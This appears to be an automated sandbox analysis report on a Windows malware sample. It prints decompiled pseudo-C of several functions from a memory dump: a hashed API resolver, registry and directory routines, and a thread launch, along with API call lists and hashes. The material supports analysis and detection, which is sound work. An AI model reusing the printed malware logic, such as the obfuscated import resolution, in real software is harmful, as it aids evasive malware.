    0x00810621
    0x00810628
    0x008106e9
    0x008106f9
    0x00810704
    0x00000000
    0x00810704
    0x0081063e
    0x00810643
    0x0081064b
    0x00000000
    0x00000000
    0x00810654
    0x00810659
    0x0081065e
    0x00810664
    0x0081066d
    0x00810672
    0x0081067f
    0x00810681
    0x00810688
    0x00810691
    0x00810696
    0x0081069b
    0x0081069f
    0x008106a1
    0x008106a6
    0x008106b7
    0x008106cc
    0x008106d1
    0x008106d7
    0x008106dc
    0x008106de
    0x008106de
    0x008106dc
    0x008106a6
    0x0081069f
    0x008106e1
    0x008106e6
    0x008106e6

    APIs
    • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,00000000,?), ref: 0081061F
    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00810704
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
      • Part of subcall function 0081D310: RtlAllocateHeap.NTDLL(009A0000,00000000,00810659,?,?,?,?), ref: 0081D353
    • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 0081067F
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: InformationToken$AllocateChangeCloseFindHeapLibraryLoadNotification
    • String ID:
    • API String ID: 2068138336-0
    • Opcode ID: 0924dd35061e1f200624de88232b5a4b614852f60535a3ddadb817e5e9f0d1dc
    • Instruction ID: 3497f4fc5c07a537d329b340e753aedb034590d9a94c809edd5723b53d476cd5
    • Opcode Fuzzy Hash: 0924dd35061e1f200624de88232b5a4b614852f60535a3ddadb817e5e9f0d1dc
    • Instruction Fuzzy Hash: 47319465E403153FEA106AA86C03FAE351DFF61759F180530FE18E51D2FA915AA486B3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008064D0, Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
    Download Yara Rule
    C-Code - Quality: 89%
    			E008064D0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E008128A0(_t11, _t38, 0xffffffff);
				E0081F5C0(9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				if(_t14 == 0) {
					E0081F5C0(9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E0081F5C0(9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}








    0x008064de
    0x008064f6
    0x00806507
    0x00806509
    0x00806510
    0x00806522
    0x00806536
    0x0080653d
    0x00806541
    0x0080654b
    0x00806556
    0x00806556
    0x0080655e

    APIs
    • RegOpenKeyExW.KERNEL32(00000000,00000003,00000000,-80000001,?,?,?,00000000), ref: 00806507
    • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00806536
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00806556
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CloseLibraryLoadOpenQueryValue
    • String ID:
    • API String ID: 3751545530-0
    • Opcode ID: 7b110a552ead95d305b3e80e3887d95556957b0b802b8bb04bbc6efa0a364464
    • Instruction ID: 473c242eb3f7745396be5298d1b67da776b602be19971af0ba6f02e796ff8b9b
    • Opcode Fuzzy Hash: 7b110a552ead95d305b3e80e3887d95556957b0b802b8bb04bbc6efa0a364464
    • Instruction Fuzzy Hash: 360144769402247BDA009E999C42FDA375CEF45B65F040224FE28E72C2E661AD5186F1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008175B0, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657threadCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E008175B0(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v56;
				intOrPtr _v64;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v216;
				char _v234;
				char _v272;
				char _v792;
				char _v1816;
				void* _t165;
				intOrPtr* _t169;
				void* _t170;
				void* _t176;
				void* _t186;
				void* _t211;
				void* _t212;
				signed int _t213;
				signed int _t217;
				signed int _t221;
				signed int _t226;
				void* _t228;
				signed int _t231;
				signed char _t235;
				void* _t243;
				signed char _t246;
				signed int _t252;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t263;
				void* _t267;
				signed char _t269;
				void* _t273;
				signed char _t283;
				void* _t296;
				signed int _t298;
				signed int _t302;
				void* _t303;
				signed char _t308;
				void* _t310;
				signed char _t312;
				signed char _t316;
				void* _t322;
				signed char _t324;
				void* _t325;
				void* _t326;
				signed char _t333;
				signed char _t335;
				intOrPtr _t340;
				intOrPtr _t350;
				signed int _t409;
				intOrPtr _t464;
				signed int _t465;
				intOrPtr _t477;
				intOrPtr _t498;
				void* _t500;
				void* _t505;
				void* _t506;
				void* _t508;
				void* _t565;
				void* _t574;
				void* _t576;
				void* _t579;

				_t165 = E00801C50(0xa20123ac, 1, 0xffffffff); // executed
				_t506 = _t505 + 0xc;
				if(_t165 == 0) {
					L2:
					_t333 = 0;
				} else {
					E008103C0(0xffffffff); // executed
					_t476 =  ==  ? 0x8026 : 0x801a;
					_t169 = E0081F5C0(8, 0x3a5687);
					_t508 = _t506 + 0xc;
					_t170 =  *_t169(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v792); // executed
					if(_t170 == 0) {
						_t477 = E0081D310(0x3d0);
						E00810420(__eflags, _t171 + 0xc); // executed
						_t3 = _t477 + 0x1c; // 0x1c, executed
						E00818A00(_t3);
						_t4 = _t477 + 0xe6; // 0xe6
						_v24 = _t4;
						_v32 = _t477;
						_t176 = E00808AE0(0x82efa8e);
						_t335 = E008027A0(0x88);
						E0081ACA0(__eflags, _t176, _v24, _t335 & 0x000000ff, E008027A0(0x84) & 0x000000ff);
						_t8 = _t477 + 0xf8; // 0xf8
						E0081CCD0(_t8); // executed
						E008222D0( &_v56);
						__eflags = _t335;
						_t360 =  !=  ? 0x823826 : 0x823486;
						_t186 = E0080F180( !=  ? 0x823826 : 0x823486,  &_v1816);
						_t336 =  &_v792;
						E0080FD50( &_v792,  &_v56, __eflags, _t186, 0); // executed
						E008222D0( &_v200);
						E0080FD50( &_v792,  &_v200, __eflags, 0, 0); // executed
						E008222D0( &_v188);
						E0080FD50( &_v792,  &_v188, __eflags, 0, 0); // executed
						E008222D0( &_v176);
						E0080FD50( &_v792,  &_v176, __eflags, 0, 0); // executed
						E008222D0( &_v164);
						E0080FD50(_t336,  &_v164, __eflags, 0, 0); // executed
						E008222D0( &_v152);
						E0080FD50(_t336,  &_v152, __eflags, 0, 1); // executed
						E008222D0( &_v140);
						E0080FD50(_t336,  &_v140, __eflags, 0, 1); // executed
						E008222D0( &_v128);
						E0080FD50(_t336,  &_v128, __eflags, 0, 0); // executed
						E008222D0( &_v116);
						E0080FD50(_t336,  &_v116, __eflags, 0, 0); // executed
						E008222D0( &_v104);
						E0080FD50(_t336,  &_v104, __eflags, 0, 0); // executed
						E008222D0( &_v92);
						E0080FD50(_t336,  &_v92, __eflags, 0, 0); // executed
						E008222D0( &_v80);
						E0080FD50(_t336,  &_v80, __eflags, 0, 0); // executed
						_t211 = E0080F180(0x823690,  &_v272);
						_t212 = E00808AE0(0x82efa8e);
						_t213 = E008027A0(0x88);
						E00813130(_t212, 0x80000001, _t211,  &_v234, _t213 & 0x000000ff, E008027A0(0x84) & 0x000000ff); // executed
						_v20 = _v32 + 0x1fe;
						_t217 = E008027A0(0x88);
						E0081A9D0(0, _v32 + 0x3be, _t217 & 0x000000ff, E008027A0(0x84) & 0x000000ff);
						_t221 = E008027A0(0x88);
						E0081A9D0(0, _v32 + 0x3c7, _t221 & 0x000000ff, E008027A0(0x84) & 0x000000ff);
						_t226 = E0080FD10( &_v792);
						E00806CC0(__eflags, _t226, 1);
						_t228 = E00822160( &_v56);
						_v24 = _t226;
						_t231 = E00804C00(E0081DC90(_t228 + 2 + _t226 * 2, 0xffffffff, _v20, 0x20), 0);
						_t491 = _t231 & 0x00000001;
						_t340 = _v32;
						_v20 = _t340 + 0x25e;
						_t235 = E0081DC90(E00822160( &_v200) + 2 + _t226 * 2, 0xffffffff, _v20, 0x20);
						_t45 = _t491 + 1; // 0x1
						__eflags = _t235;
						_t462 =  !=  ? _t231 & 0x00000001 : _t45;
						_v20 = _t340 + 0x27e;
						_v20 = E0081DC90(E00822160( &_v188) + 2 + _v24 * 2, 0xffffffff, _v20, 0x20);
						_v28 = _t340 + 0x29e;
						_t243 = E0081DC90(E00822160( &_v176) + 2 + _v24 * 2, 0xffffffff, _v28, 0x20);
						__eflags = _v20 - 1;
						asm("adc edi, 0x0");
						__eflags = _t243 - 1;
						asm("adc edi, 0x0");
						_t246 = E0081DC90(E00822160( &_v164) + 2 + _v24 * 2, 0xffffffff, _t340 + 0x2be, 0x20);
						__eflags = _t246;
						_v20 = E00802640(0,  !=  ? _t231 & 0x00000001 : _t45);
						_v28 = _v32 + 0x21e;
						_t252 = E00804C00(E0081DC90(E00822160( &_v152) + 2 + _v24 * 2, 0xffffffff, _v28, 0x20), 0);
						_t256 = E0081DC90(E00822160( &_v140) + 2 + _v24 * 2, 0xffffffff, _v32 + 0x23e, 0x20);
						_t257 = E00808AE0(0x1c6b4dea);
						__eflags = _t256 - 1;
						asm("adc ebx, 0x0");
						_t464 = _v32;
						_v20 = _t464 + 0x2de;
						_t259 = E00822160( &_v128);
						_t92 = _v24 * 2; // 0x2
						__eflags = E0081DC90(_t259 + _t92 + 2, 0xffffffff, _v20, E00808AE0(0x82efaac)) - 1;
						asm("adc ebx, 0x0");
						_v20 = _t464 + 0x2fe;
						_t498 = _t464;
						_t263 = E00822160( &_v116);
						_t465 = _v24;
						__eflags = E0081DC90(_t263 + 2 + _t465 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc ebx, 0x0");
						_v28 = (0 | _t246 == 0x00000000) - _v20 + (_t252 & 0x00000001) - _t257 + 0x1445b766;
						_v20 = _t498 + 0x31e;
						_t267 = E00822160( &_v104);
						_t108 = _t465 * 2; // 0x2
						_t269 = E0081DC90(_t267 + _t108 + 2, 0xffffffff, _v20, E00808AE0(0x82efaac));
						__eflags = _t269;
						_v20 = _v28 - E00808AE0(0x6d4ac025) + (0 | _t269 == 0x00000000) + 0x65643aa9;
						E00806CC0(__eflags, _v28, _t269 == 0);
						_t350 = _t498;
						_t273 = E00822160( &_v92);
						_t121 = _v24 * 2; // 0x2
						__eflags = E0081DC90(_t273 + _t121 + 2, 0xffffffff, _t498 + 0x33e, E00808AE0(0x82efaac));
						_t500 = E00806CC0(E0081DC90(_t273 + _t121 + 2, 0xffffffff, _t498 + 0x33e, E00808AE0(0x82efaac)), _v20, 0 | E0081DC90(_t273 + _t121 + 2, 0xffffffff, _t498 + 0x33e, E00808AE0(0x82efaac)) == 0x00000000);
						__eflags = E0081DC90(E00822160( &_v80) + 2 + _v24 * 2, 0xffffffff, _t350 + 0x35e, 0x20);
						_t409 = 0 | __eflags == 0x00000000;
						E00806CC0(__eflags, _t500, _t409);
						_t283 = E0081DC90( &_v234, 0xffffffff, _t350 + 0x39e, 0x20);
						_t565 = _t508 + 0x20c;
						__eflags = _t283;
						_t412 = (0 | __eflags == 0x00000000) + _t500 + _t409;
						if(__eflags > 0) {
							L14:
							_t333 = 0;
							__eflags = 0;
						} else {
							_t296 = E00808AE0(0x82eea8c);
							_t298 = E0081B4E0(_t296, E00808AE0(0x82e0573));
							_t302 = E008088A0(__eflags,  !(E00808AE0(0x82e0573) ^ _t298), _t298);
							_t303 = E00808AE0(0x82eea8c);
							 *(_t350 + 0x1fa) = E0081B4E0(_t303, E00808AE0(0x82e0573)) << 0x00000010 | _t302;
							_t308 = E008173F0(_t412, __eflags, _t350); // executed
							_t574 = _t565 + 0x30;
							__eflags = _t308;
							if(_t308 == 0) {
								goto L14;
							} else {
								_t504 = _a4;
								E00821F10( &_v44);
								_t310 = E00822160(_a4);
								_t312 = E00821090(__eflags, _t310,  &_v68, E00808AE0(0x82efa8e)); // executed
								_t576 = _t574 + 0x10;
								__eflags = _t312;
								if(_t312 != 0) {
									__eflags = _v64 + _v68;
									E00822310( &_v44, _v68, _v64 + _v68); // executed
									E00821580( &_v68); // executed
									_t576 = _t576 + 4;
								}
								_t427 =  &_v44;
								__eflags = E00822780( &_v44);
								if(__eflags != 0) {
									_t322 = E00822780( &_v44);
									_t324 = E008170A0(__eflags,  &_v216, E00822A70( &_v44), _t322); // executed
									_t579 = _t576 + 0xc;
									__eflags = _t324;
									if(__eflags != 0) {
										E008185B0(_t324,  &_v216, __eflags); // executed
									}
									_t325 = E00822780( &_v44);
									_t326 = E00822A70( &_v44);
									_t427 =  &_v56;
									E00820E00(E00822160( &_v56), __eflags, _t327, _t326, _t325); // executed
									_t576 = _t579 + 0xc; // executed
								}
								E00816C60(_t427, __eflags); // executed
								E00817E00(_t427, __eflags); // executed
								_t316 = E0080CBA0();
								__eflags = _t316;
								if(_t316 != 0) {
									E0081F5C0(0, 0xa0733d4);
									CreateThread(0, 0, E0080EE40, E0080F960(E00822160(_t504), 0xffffffff), 0, 0); // executed
								}
								E008222B0( &_v44); // executed
								_t333 = 1;
							}
						}
						E00822960( &_v80);
						E00822960( &_v92);
						E00822960( &_v104);
						E00822960( &_v116);
						E00822960( &_v128);
						E00822960( &_v140);
						E00822960( &_v152);
						E00822960( &_v164);
						E00822960( &_v176);
						E00822960( &_v188);
						E00822960( &_v200);
						E00822960( &_v56);
					} else {
						goto L2;
					}
				}
				return _t333;
			}

















































































    0x008175c5
    0x008175ca
    0x008175cf
    0x0081760d
    0x0081760d
    0x008175d1
    0x008175d3
    0x008175e7
    0x008175f1
    0x008175f6
    0x00817607
    0x0081760b
    0x00817624
    0x0081762a
    0x00817632
    0x00817635
    0x0081763a
    0x00817640
    0x00817643
    0x0081764b
    0x00817662
    0x0081767d
    0x00817685
    0x0081768c
    0x00817699
    0x008176a8
    0x008176aa
    0x008176b5
    0x008176bd
    0x008176ca
    0x008176da
    0x008176e7
    0x008176f7
    0x00817704
    0x00817714
    0x00817721
    0x00817731
    0x0081773e
    0x0081774e
    0x0081775b
    0x0081776b
    0x00817778
    0x00817785
    0x00817792
    0x0081779f
    0x008177ac
    0x008177b9
    0x008177c6
    0x008177d3
    0x008177e0
    0x008177ed
    0x008177fa
    0x0081780e
    0x0081781d
    0x0081782c
    0x00817859
    0x0081786a
    0x00817878
    0x0081789a
    0x008178ad
    0x008178cf
    0x008178de
    0x008178eb
    0x008178f6
    0x008178ff
    0x00817915
    0x0081791f
    0x00817922
    0x0081792b
    0x00817945
    0x0081794d
    0x00817950
    0x00817952
    0x0081795b
    0x00817980
    0x00817989
    0x008179a3
    0x008179ab
    0x008179af
    0x008179b2
    0x008179b5
    0x008179d6
    0x008179e0
    0x008179f0
    0x008179fc
    0x00817a24
    0x00817a4f
    0x00817a5e
    0x00817a68
    0x00817a6b
    0x00817a6e
    0x00817a77
    0x00817a7d
    0x00817a85
    0x00817aa5
    0x00817aa8
    0x00817ab1
    0x00817ab4
    0x00817ab9
    0x00817abe
    0x00817ad5
    0x00817ad8
    0x00817ae1
    0x00817aea
    0x00817af0
    0x00817af5
    0x00817b0d
    0x00817b17
    0x00817b37
    0x00817b3c
    0x00817b44
    0x00817b4f
    0x00817b57
    0x00817b77
    0x00817b88
    0x00817baf
    0x00817bb1
    0x00817bb9
    0x00817bd3
    0x00817bd8
    0x00817bdd
    0x00817be2
    0x00817be4
    0x00817d78
    0x00817d78
    0x00817d78
    0x00817bea
    0x00817bef
    0x00817c08
    0x00817c25
    0x00817c34
    0x00817c5a
    0x00817c61
    0x00817c66
    0x00817c69
    0x00817c6b
    0x00000000
    0x00817c71
    0x00817c71
    0x00817c77
    0x00817c7e
    0x00817c98
    0x00817c9d
    0x00817ca0
    0x00817ca2
    0x00817caa
    0x00817cb1
    0x00817cb7
    0x00817cbc
    0x00817cbc
    0x00817cbf
    0x00817cc7
    0x00817cc9
    0x00817cd0
    0x00817ce7
    0x00817cec
    0x00817cef
    0x00817cf1
    0x00817cf9
    0x00817cf9
    0x00817d03
    0x00817d0c
    0x00817d13
    0x00817d1e
    0x00817d23
    0x00817d23
    0x00817d26
    0x00817d2b
    0x00817d30
    0x00817d35
    0x00817d37
    0x00817d40
    0x00817d6a
    0x00817d6a
    0x00817d6f
    0x00817d74
    0x00817d74
    0x00817c6b
    0x00817d7d
    0x00817d85
    0x00817d8d
    0x00817d95
    0x00817d9d
    0x00817da8
    0x00817db3
    0x00817dbe
    0x00817dc9
    0x00817dd4
    0x00817ddf
    0x00817de7
    0x00000000
    0x00000000
    0x00000000
    0x0081760b
    0x00817df8

    APIs
      • Part of subcall function 0080FD50: CreateDirectoryW.KERNEL32(?,00000000), ref: 0080FDF3
      • Part of subcall function 00813130: RegCreateKeyExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,80000001,00000000,?,?,?), ref: 00813160
      • Part of subcall function 00813130: RegCreateKeyExW.KERNEL32(00000000,80000001,00000000,00000000,00000000,00000003,00000000,?,?), ref: 008131E2
      • Part of subcall function 00821090: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008210FB
    • CreateThread.KERNEL32(00000000,00000000,Function_0000EE40,00000000,00000000,00000000), ref: 00817D6A
      • Part of subcall function 00821580: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?), ref: 008215A4
      • Part of subcall function 00821580: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008215C7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Create$ChangeCloseDirectoryFileFindFreeNotificationThreadVirtual
    • String ID: BV^U
    • API String ID: 1065963300-3271193798
    • Opcode ID: 640c5499de0cc9c386c88f7a228e6a9af587e419ba22ee62751d7619f5a57847
    • Instruction ID: 2726512ce7750dd90c3ec463e6789e4132ae76b55b52134052160fed8e735230
    • Opcode Fuzzy Hash: 640c5499de0cc9c386c88f7a228e6a9af587e419ba22ee62751d7619f5a57847
    • Instruction Fuzzy Hash: C022C8B1E002296BDB10B6A8AC47FFE7268FF50714F440564F915E72C3FE716A8586A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0081F5C0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190libraryCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E0081F5C0(signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v564;
				intOrPtr _t37;
				signed char _t39;
				signed int _t40;
				intOrPtr* _t41;
				intOrPtr* _t44;
				struct HINSTANCE__* _t48;
				void* _t55;
				signed int _t58;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				void* _t69;
				void* _t79;

				_t66 = _a8;
				_t58 = _t66 - (_t66 * 0x3531dec1 >> 0x20 >> 7) * 0x268;
				0;
				0;
				while(1) {
					_t37 =  *((intOrPtr*)(0x825b3c + _t58 * 4));
					if(_t37 == 0) {
						break;
					}
					if(_t37 == _t66) {
						return  *(0x8270c0 + _t58 * 4);
					} else {
						_t55 = E00802640(_t58, E00808AE0(0xf66d2cbf));
						_t69 = _t69 + 0xc;
						_t79 = _t58 - 0x266;
						_t58 = 0;
						if(_t79 <= 0) {
							_t58 = _t55 + 0xfe43d634;
						}
						continue;
					}
				}
				_v20 = 0x825b3c + _t58 * 4;
				_t67 = _a4;
				__eflags = _t67 - 0x23;
				if(__eflags > 0) {
					L40:
					_t65 =  *(0x825a74 + _t67 * 4);
					_t39 = E0080B6D0(__eflags,  *(0x825a74 + _t67 * 4), 0);
					__eflags = _t39 & 0x00000001;
					if((_t39 & 0x00000001) == 0) {
						L50:
						_t68 = _a8;
						_t40 = E0081F870(_t65, _t68);
						__eflags = _t40;
						if(_t40 == 0) {
							_t41 = E0081F5C0(0, 0xba94474);
							 *_t41(0);
							_t40 = 0;
							__eflags = 0;
						}
						L52:
						 *_v20 = _t68;
						 *(0x8270c0 + _t58 * 4) = _t40;
						return _t40;
					}
					__eflags = _t67 - 0x17;
					if(_t67 == 0x17) {
						_t65 =  *0x8270b4; // 0x0
						__eflags = _t65;
						if(_t65 != 0) {
							L49:
							 *(0x825a74 + _a4 * 4) = _t65;
							goto L50;
						}
						L47:
						_t44 = E0081F5C0(0, 0xba94474);
						 *_t44(0);
						 *(0x825a74 + _a4 * 4) = _t65;
						_t40 = 0;
						_t68 = _a8;
						goto L52;
					}
					__eflags = _t67 - 0x16;
					if(_t67 == 0x16) {
						_t65 =  *0x825114; // 0x0
						__eflags = _t65;
						if(_t65 == 0) {
							goto L47;
						}
						goto L49;
					}
					__eflags = _t67 - 0x15;
					if(_t67 != 0x15) {
						_t48 = LoadLibraryA( &_v52); // executed
						_t65 = _t48;
						__eflags = _t65;
						if(_t65 != 0) {
							goto L49;
						}
						goto L47;
					}
					_t65 =  *0x825140; // 0x0
					__eflags = _t65;
					if(_t65 != 0) {
						goto L49;
					}
					goto L47;
				}
				switch( *((intOrPtr*)(_t67 * 4 +  &M0082338C))) {
					case 0:
						L39:
						E008059B0( &_v52, E00801250(0x823f44,  &_v564), 0xffffffff);
						_t69 = _t69 + 0x14;
						goto L40;
					case 1:
						goto L39;
					case 2:
						__eax = 0x82347b;
						goto L39;
					case 3:
						__eax = 0x823aa8;
						goto L39;
					case 4:
						__eax = 0x82353c;
						goto L39;
					case 5:
						__eax = 0x823b84;
						goto L39;
					case 6:
						__eax = 0x8237c4;
						goto L39;
					case 7:
						__eax = 0x823468;
						goto L39;
					case 8:
						__eax = 0x82352d;
						goto L39;
					case 9:
						__eax = 0x8239f8;
						goto L39;
					case 0xa:
						__eax = 0x823508;
						goto L39;
					case 0xb:
						__eax = 0x82377a;
						goto L39;
					case 0xc:
						__eax = 0x823424;
						goto L39;
					case 0xd:
						__eax = 0x823a1d;
						goto L39;
					case 0xe:
						__eax = 0x8239e7;
						goto L39;
					case 0xf:
						__eax = 0x8239d2;
						goto L39;
					case 0x10:
						__eax = 0x823940;
						goto L39;
					case 0x11:
						__eax = 0x823830;
						goto L39;
					case 0x12:
						__eax = 0x8239df;
						goto L39;
					case 0x13:
						__eax = 0x8240bc;
						goto L39;
					case 0x14:
						__eax = 0x8237cf;
						goto L39;
					case 0x15:
						goto L40;
					case 0x16:
						__eax = 0x82383d;
						goto L39;
					case 0x17:
						__eax = 0x823522;
						goto L39;
					case 0x18:
						__eax = 0x82401a;
						goto L39;
					case 0x19:
						__eax = 0x82408a;
						goto L39;
					case 0x1a:
						__eax = 0x823a05;
						goto L39;
					case 0x1b:
						__eax = 0x82409c;
						goto L39;
					case 0x1c:
						__eax = 0x8240aa;
						goto L39;
					case 0x1d:
						__eax = 0x823a12;
						goto L39;
					case 0x1e:
						__eax = 0x8235cc;
						goto L39;
					case 0x1f:
						__eax = 0x82400e;
						goto L39;
					case 0x20:
						__eax = 0x823f38;
						goto L39;
				}
			}



















    0x0081f5cc
    0x0081f5e3
    0x0081f5eb
    0x0081f5ef
    0x0081f5f0
    0x0081f5f0
    0x0081f5f9
    0x00000000
    0x00000000
    0x0081f5fd
    0x00000000
    0x0081f5ff
    0x0081f60e
    0x0081f613
    0x0081f616
    0x0081f61c
    0x0081f621
    0x0081f628
    0x0081f628
    0x00000000
    0x0081f621
    0x0081f5fd
    0x0081f633
    0x0081f636
    0x0081f639
    0x0081f63c
    0x0081f774
    0x0081f774
    0x0081f77e
    0x0081f786
    0x0081f788
    0x0081f7eb
    0x0081f7eb
    0x0081f7f0
    0x0081f7f8
    0x0081f7fa
    0x0081f803
    0x0081f80d
    0x0081f80f
    0x0081f80f
    0x0081f80f
    0x0081f811
    0x0081f814
    0x0081f816
    0x00000000
    0x0081f816
    0x0081f78a
    0x0081f78d
    0x0081f7a9
    0x0081f7af
    0x0081f7b1
    0x0081f7e1
    0x0081f7e4
    0x00000000
    0x0081f7e4
    0x0081f7b3
    0x0081f7ba
    0x0081f7c4
    0x0081f7c9
    0x0081f7d0
    0x0081f7d2
    0x00000000
    0x0081f7d2
    0x0081f78f
    0x0081f792
    0x0081f7d7
    0x0081f7dd
    0x0081f7df
    0x00000000
    0x00000000
    0x00000000
    0x0081f7df
    0x0081f794
    0x0081f797
    0x0081f82c
    0x0081f832
    0x0081f834
    0x0081f836
    0x00000000
    0x00000000
    0x00000000
    0x0081f838
    0x0081f79d
    0x0081f7a3
    0x0081f7a5
    0x00000000
    0x00000000
    0x00000000
    0x0081f7a7
    0x0081f647
    0x00000000
    0x0081f755
    0x0081f76c
    0x0081f771
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0081f664
    0x00000000
    0x00000000
    0x0081f66e
    0x00000000
    0x00000000
    0x0081f678
    0x00000000
    0x00000000
    0x0081f682
    0x00000000
    0x00000000
    0x0081f68c
    0x00000000
    0x00000000
    0x0081f696
    0x00000000
    0x00000000
    0x0081f6a0
    0x00000000
    0x00000000
    0x0081f6aa
    0x00000000
    0x00000000
    0x0081f6b4
    0x00000000
    0x00000000
    0x0081f6be
    0x00000000
    0x00000000
    0x0081f6c8
    0x00000000
    0x00000000
    0x0081f6d2
    0x00000000
    0x00000000
    0x0081f6d9
    0x00000000
    0x00000000
    0x0081f6e0
    0x00000000
    0x00000000
    0x0081f6e7
    0x00000000
    0x00000000
    0x0081f6ee
    0x00000000
    0x00000000
    0x0081f6f5
    0x00000000
    0x00000000
    0x0081f6fc
    0x00000000
    0x00000000
    0x0081f703
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0081f70a
    0x00000000
    0x00000000
    0x0081f711
    0x00000000
    0x00000000
    0x0081f718
    0x00000000
    0x00000000
    0x0081f71f
    0x00000000
    0x00000000
    0x0081f726
    0x00000000
    0x00000000
    0x0081f750
    0x00000000
    0x00000000
    0x0081f72d
    0x00000000
    0x00000000
    0x0081f734
    0x00000000
    0x00000000
    0x0081f73b
    0x00000000
    0x00000000
    0x0081f742
    0x00000000
    0x00000000
    0x0081f749
    0x00000000
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: LibraryLoad
    • String ID: VD
    • API String ID: 1029625771-1791571226
    • Opcode ID: e26d0abd3ec0233b019d8d419052fc6eb67851b3f3232d6f94075c623a951f01
    • Instruction ID: d2149930e6554a8151539344d98929425d4584c7994fef5ba9001c4b1ca7e14c
    • Opcode Fuzzy Hash: e26d0abd3ec0233b019d8d419052fc6eb67851b3f3232d6f94075c623a951f01
    • Instruction Fuzzy Hash: 8A51E2696081A997CB105E987C51AE5225CFF8131CF244932BB2BDB3E3EB34CEC55752
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0080FD50, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0080FD50(void* __ecx, intOrPtr __edx, void* __eflags, char* _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v54;
				short _v56;
				char _v576;
				signed char _t14;
				void* _t15;
				signed int _t16;
				signed char _t17;
				int _t19;
				void* _t23;
				WCHAR* _t28;
				void* _t34;
				char* _t35;
				void* _t38;
				void* _t39;
				void* _t43;
				void* _t44;

				_v20 = __edx;
				_t34 = __ecx;
				_t35 = _a4;
				_v56 = 0;
				_t14 = E008067E0(_t35, 0);
				_t39 = _t38 + 8;
				_t47 = _t14 & 0x00000001;
				if((_t14 & 0x00000001) != 0) {
					_t35 =  &_v56;
					_v56 = 0x2e;
					E0081ACA0(_t47, 0,  &_v54, 2, 3);
					_t39 = _t39 + 0x10;
				}
				_v24 = _t35;
				_t15 = E00808AE0(0x82efa8e);
				_t16 = E008027A0(0x8f);
				_t17 = E008027A0(0x89);
				_t28 =  &_v576;
				_t19 = E0080DBE0(_t15, _t34, _t28, 0, _t16 & 0x000000ff, _t17 & 0x000000ff); // executed
				_t43 = _t39 + 0x24;
				if(_t19 != 0) {
					E0081F5C0(0, 0x3087237);
					_t44 = _t43 + 8;
					_t19 = CreateDirectoryW(_t28, 0); // executed
					if(_t19 != 0) {
						_t50 = _a8;
						if(_a8 != 0) {
							E008126A0(_t50, _t28, 1, 1); // executed
							_t44 = _t44 + 0xc;
						}
						E00822250(0x104);
						_t23 = E0080DBE0(0, _t28, E00822160(_v20), _v24, 3, 5); // executed
						return _t23;
					}
				}
				return _t19;
			}





















    0x0080fd5c
    0x0080fd5f
    0x0080fd61
    0x0080fd64
    0x0080fd6d
    0x0080fd72
    0x0080fd75
    0x0080fd77
    0x0080fd79
    0x0080fd7c
    0x0080fd8c
    0x0080fd91
    0x0080fd91
    0x0080fd94
    0x0080fd9c
    0x0080fdab
    0x0080fdba
    0x0080fdc8
    0x0080fdd5
    0x0080fdda
    0x0080fddf
    0x0080fde8
    0x0080fded
    0x0080fdf3
    0x0080fdf7
    0x0080fdf9
    0x0080fdfd
    0x0080fe04
